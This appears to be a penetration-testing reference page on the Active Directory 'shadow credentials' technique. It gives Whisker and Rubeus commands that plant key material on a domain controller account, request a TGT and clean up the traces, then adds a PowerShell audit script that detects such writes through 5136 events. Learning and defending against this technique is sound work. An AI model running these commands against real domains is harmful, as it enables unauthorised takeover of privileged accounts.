Shadow credentials

Kerberos authentication normally uses a username and password, but with PKINIT it can also use a public/private key pair. If you are able to write to an object's msDS-KeyCredentialLink attribute, you can add your own key material to it and then request TGTs for that object.

Requirements:

  • Ability to write to msDS-KeyCredentialLink of an object
  • Domain must have ADCS and a CA configured
  • At least one domain controller running Windows Server 2016 or later, which is needed for key-trust PKINIT
```powershell
# List keys on the target object where we can write to msDS-KeyCredentialLink, e.g. dc01$ in this case
Whisker.exe list /target:"dc01$"

# Add new key material to the DC01$ account; Whisker prints the matching Rubeus command
Whisker.exe add /target:"dc01$"

# Ask for a TGT; add /enctype:aes256 for better opsec
Rubeus.exe asktgt /user:"dc01$" /certificate:"CERT" /password:"password" /nowrap /enctype:aes256

# Now we are able to access the shares on the target computer

# Remove the abused key material (+ restore the original attribute content)
Whisker.exe remove /target:"dc01$" /deviceid:"device_id"
```
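From the defender's side, the abuse above leaves two traces: an msDS-KeyCredentialLink value on an account that normally has none, and a directory-change audit event (5136) recording who wrote the attribute. The following script is an added example and is not part of the original page or of the Whisker/Rubeus projects. It assumes the ActiveDirectory RSAT module is installed, that "Audit Directory Service Changes" is enabled, and that the objects of interest carry a SACL covering attribute writes, so that 5136 events are actually logged on the domain controller. The `%%14674`/`%%14675` operation-type codes are the message-table references Windows uses in 5136 for "Value Added" and "Value Deleted".

```powershell
# Added example (not from the original page): audit and detection for shadow-credential abuse.
# Assumes RSAT ActiveDirectory module and directory-service-change auditing (event 5136).
Import-Module ActiveDirectory

# Baseline: which objects currently carry key material in msDS-KeyCredentialLink?
# Usually only Windows Hello for Business / hybrid-joined devices should; a domain
# controller or a privileged user with a value here deserves a closer look.
function Get-KeyCredentialLinkBaseline {
    Get-ADObject -LDAPFilter '(msDS-KeyCredentialLink=*)' `
                 -Properties msDS-KeyCredentialLink, whenChanged |
        Select-Object Name, ObjectClass, DistinguishedName, whenChanged,
            @{ Name = 'KeyCount'; Expression = { @($_.'msDS-KeyCredentialLink').Count } }
}

# Detection: pull 5136 (directory object modified) events from the local Security log
# and keep only writes to msDS-KeyCredentialLink, reporting who changed what.
function Get-KeyCredentialLinkChanges {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136; StartTime = $Since } `
                 -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten the EventData <Data Name="..."> elements into a hashtable
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

            if ($data['AttributeLDAPDisplayName'] -eq 'msDS-KeyCredentialLink') {
                $op = switch ($data['OperationType']) {
                    '%%14674' { 'ValueAdded' }
                    '%%14675' { 'ValueDeleted' }
                    default   { $data['OperationType'] }
                }
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    Actor     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                    Target    = $data['ObjectDN']
                    Operation = $op
                }
            }
        }
}

# Usage (run on a domain controller or against an exported Security log):
Get-KeyCredentialLinkBaseline | Format-Table -AutoSize
Get-KeyCredentialLinkChanges -Since (Get-Date).AddDays(-1) | Format-Table -AutoSize
```

The interesting rows are those where the Actor is not the object itself (legitimate key-trust enrolment is performed by the device or by the provisioning service, not by an unrelated user), and any ValueAdded followed shortly by ValueDeleted on the same target, which matches the add/remove pattern of the commands above. The lasting fix is on the access-control side: review which principals hold write permission on msDS-KeyCredentialLink for computer and privileged accounts, since the attribute should not be writable by ordinary users.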